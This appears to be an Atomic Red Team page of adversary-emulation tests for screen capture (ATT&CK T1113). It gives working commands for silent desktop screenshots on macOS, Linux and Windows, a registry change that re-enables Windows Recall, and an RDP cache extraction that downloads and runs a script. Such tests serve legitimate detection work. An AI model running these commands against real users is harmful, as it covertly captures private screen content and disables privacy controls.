T1113
Screen Capture
Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
Atomic Tests
-
Atomic Test #6 - Capture Linux Desktop using Import Tool (freebsd)
-
Atomic Test #9 - Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
Atomic Test #1 - Screencapture
Use screencapture command to collect a full desktop screenshot
Supported Platforms: macOS
auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands: Run with bash!
screencapture #{output_file}Cleanup Commands:
rm #{output_file}Atomic Test #2 - Screencapture (silent)
Use screencapture command to collect a full desktop screenshot
Supported Platforms: macOS
auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands: Run with bash!
screencapture -x #{output_file}Cleanup Commands:
rm #{output_file}Atomic Test #3 - X Windows Capture
Use xwd command to collect a full desktop screenshot and review file with xwud
Supported Platforms: Linux
auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd |
| package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps |
| package_installer | Package installer command for linux. Debian system command- apt-get install x11-apps | string | yum install -y xorg-x11-apps |
Attack Commands: Run with bash!
xwd -root -out #{output_file}
xwud -in #{output_file}Cleanup Commands:
rm #{output_file}Dependencies: Run with bash!
Description: Package with XWD and XWUD must exist on device
Check Prereq Commands:
if #{package_checker} > /dev/null; then exit 0; else exit 1; fiGet Prereq Commands:
sudo #{package_installer}Atomic Test #4 - X Windows Capture (freebsd)
Use xwd command to collect a full desktop screenshot and review file with xwud
Supported Platforms: Linux
auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd |
Attack Commands: Run with sh!
xwd -root -out #{output_file}
xwud -in #{output_file}Cleanup Commands:
rm #{output_file}Dependencies: Run with sh!
Description: Package with XWD and XWUD must exist on device
Check Prereq Commands:
if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fiGet Prereq Commands:
pkg install -y xwd xwudAtomic Test #5 - Capture Linux Desktop using Import Tool
Use import command from ImageMagick to collect a full desktop screenshot
Supported Platforms: Linux
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands: Run with bash!
import -window root #{output_file}Cleanup Commands:
rm #{output_file}Dependencies: Run with bash!
Description: ImageMagick must be installed
Check Prereq Commands:
if import -help > /dev/null 2>&1; then exit 0; else exit 1; fiGet Prereq Commands:
sudo apt install graphicsmagick-imagemagick-compatAtomic Test #6 - Capture Linux Desktop using Import Tool (freebsd)
Use import command from ImageMagick to collect a full desktop screenshot
Supported Platforms: Linux
auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands: Run with sh!
import -window root #{output_file}Cleanup Commands:
rm #{output_file}Dependencies: Run with sh!
Description: ImageMagick must be installed
Check Prereq Commands:
if import -help > /dev/null 2>&1; then exit 0; else exit 1; fiGet Prereq Commands:
pkg install -y ImageMagick7Atomic Test #7 - Windows Screencapture
Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
Supported Platforms: Windows
auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | c:\temp\T1113_desktop.zip |
| recording_time | Time to take screenshots | integer | 5 |
Attack Commands: Run with powershell!
cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"Cleanup Commands:
rm #{output_file} -ErrorAction IgnoreAtomic Test #8 - Windows Screen Capture (CopyFromScreen)
Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
Supported Platforms: Windows
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Path where captured results will be placed | path | $env:TEMP\T1113.png |
Attack Commands: Run with powershell!
Add-Type -AssemblyName System.Windows.Forms
$screen = [Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
$graphic = [Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save("#{output_file}")Cleanup Commands:
Remove-Item #{output_file} -ErrorAction IgnoreAtomic Test #9 - Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
- https://learn.microsoft.com/en-us/windows/client-management/manage-recall
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Supported Platforms: Windows
auto_generated_guid: 5a496325-0115-4274-8eb9-755b649ad0fb
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /fCleanup Commands:
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /fAtomic Test #10 - RDP Bitmap Cache Extraction via bmc-tools
Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script. This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
Supported Platforms: Windows
auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| cache_path | Path to the RDP Cache directory or specific .bmc file | path | $env:LOCALAPPDATA\Microsoft\Terminal Server Client\Cache |
| output_dir | Directory to save reconstructed images | path | $env:TEMP\rdp_screens |
Attack Commands: Run with powershell!
$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'
$toolsDir = "$env:TEMP\bmc-tools.py"
# create output directory
New-Item -ItemType Directory -Path #{output_dir} -Force | Out-Null
# python script download
& curl.exe -L $url --output $toolsDir
# execution step
if (Test-Path $toolsDir) { python $toolsDir -s "#{cache_path}" -d #{output_dir} -b }Cleanup Commands:
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinueDependencies: Run with powershell!
Description: Python must be installed and in the PATH to run bmc-tools.py
Check Prereq Commands:
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }Get Prereq Commands:
Write-Host "Please install Python manually."